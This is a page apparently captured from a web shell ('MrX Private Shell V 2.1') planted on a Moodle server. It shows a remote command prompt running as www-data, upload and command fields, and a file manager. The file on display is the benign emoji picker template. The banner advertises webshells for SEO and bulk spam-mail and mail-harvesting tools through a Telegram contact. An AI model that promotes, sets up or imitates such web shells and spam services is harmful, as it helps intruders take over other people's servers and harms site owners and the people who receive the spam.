__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
{{!
    This file is part of Moodle - http://moodle.org/

    Moodle is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    Moodle is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with Moodle.  If not, see <http://www.gnu.org/licenses/>.
}}
{{!
    @template core/emoji/picker

    This template will render the emoji picker.

    Classes required for JS:
    * none

    Data attributes required for JS:
    *

    Context variables required for this template:
    *

    Example context (json):
    {}

}}

<div
    data-region="emoji-picker"
    class="card shadow emoji-picker"
>
    <div class="card-header px-1 pt-1 pb-0 d-flex justify-content-between flex-shrink-0">
        <button
            class="btn btn-outline-secondary icon-no-margin category-button rounded-0 selected"
            data-action="show-category"
            data-category="Recent"
            title="{{#str}} emojicategoryrecent, core {{/str}}"
        >
            {{#pix}} i/emojicategoryrecent, core {{/pix}}
        </button>
        <button
            class="btn btn-outline-secondary icon-no-margin category-button rounded-0"
            data-action="show-category"
            data-category="Smileys & Emotion"
            title="{{#str}} emojicategorysmileysemotion, core {{/str}}"
        >
            {{#pix}} i/emojicategorysmileysemotion, core {{/pix}}
        </button>
        <button
            class="btn btn-outline-secondary icon-no-margin category-button rounded-0"
            data-action="show-category"
            data-category="People & Body"
            title="{{#str}} emojicategorypeoplebody, core {{/str}}"
        >
            {{#pix}} i/emojicategorypeoplebody, core {{/pix}}
        </button>
        <button
            class="btn btn-outline-secondary icon-no-margin category-button rounded-0"
            data-action="show-category"
            data-category="Animals & Nature"
            title="{{#str}} emojicategoryanimalsnature, core {{/str}}"
        >
            {{#pix}} i/emojicategoryanimalsnature, core {{/pix}}
        </button>
        <button
            class="btn btn-outline-secondary icon-no-margin category-button rounded-0"
            data-action="show-category"
            data-category="Food & Drink"
            title="{{#str}} emojicategoryfooddrink, core {{/str}}"
        >
            {{#pix}} i/emojicategoryfooddrink, core {{/pix}}
        </button>
        <button
            class="btn btn-outline-secondary icon-no-margin category-button rounded-0"
            data-action="show-category"
            data-category="Travel & Places"
            title="{{#str}} emojicategorytravelplaces, core {{/str}}"
        >
            {{#pix}} i/emojicategorytravelplaces, core {{/pix}}
        </button>
        <button
            class="btn btn-outline-secondary icon-no-margin category-button rounded-0"
            data-action="show-category"
            data-category="Activities"
            title="{{#str}} emojicategoryactivities, core {{/str}}"
        >
            {{#pix}} i/emojicategoryactivities, core {{/pix}}
        </button>
        <button
            class="btn btn-outline-secondary icon-no-margin category-button rounded-0"
            data-action="show-category"
            data-category="Objects"
            title="{{#str}} emojicategoryobjects, core {{/str}}"
        >
            {{#pix}} i/emojicategoryobjects, core {{/pix}}
        </button>
        <button
            class="btn btn-outline-secondary icon-no-margin category-button rounded-0"
            data-action="show-category"
            data-category="Symbols"
            title="{{#str}} emojicategorysymbols, core {{/str}}"
        >
            {{#pix}} i/emojicategorysymbols, core {{/pix}}
        </button>
        <button
            class="btn btn-outline-secondary icon-no-margin category-button rounded-0"
            data-action="show-category"
            data-category="Flags"
            title="{{#str}} emojicategoryflags, core {{/str}}"
        >
            {{#pix}} i/emojicategoryflags, core {{/pix}}
        </button>
    </div>
    <div class="card-body p-2 d-flex flex-column overflow-hidden">
        <div class="input-group mb-1 flex-shrink-0">
            <div class="input-group-prepend">
                <span class="input-group-text pe-0 bg-white text-muted">
                    {{#pix}} i/search, core {{/pix}}
                </span>
            </div>
            <input
                type="text"
                class="form-control border-start-0"
                placeholder="{{#str}} search, core {{/str}}"
                aria-label="{{#str}} search, core {{/str}}"
                data-region="search-input"
            >
        </div>
        <div class="flex-grow-1 overflow-auto emojis-container h-100" data-region="emojis-container">
            <div class="position-relative" data-region="row-container"></div>
        </div>
        <div class="flex-grow-1 overflow-auto search-results-container h-100 hidden" data-region="search-results-container">
            <div class="position-relative" data-region="row-container"></div>
        </div>
    </div>
    <div
        class="card-footer d-flex flex-shrink-0"
        data-region="footer"
    >
        <div class="emoji-preview" data-region="emoji-preview"></div>
        <div data-region="emoji-short-name" class="emoji-short-name text-muted text-wrap ms-2"></div>
    </div>
</div>

Filemanager

Name Type Size Permission Actions
auto_complete.mustache File 1.45 KB 0777
emoji_row.mustache File 1.41 KB 0777
header_row.mustache File 1.09 KB 0777
picker.mustache File 5.74 KB 0777
Filemanager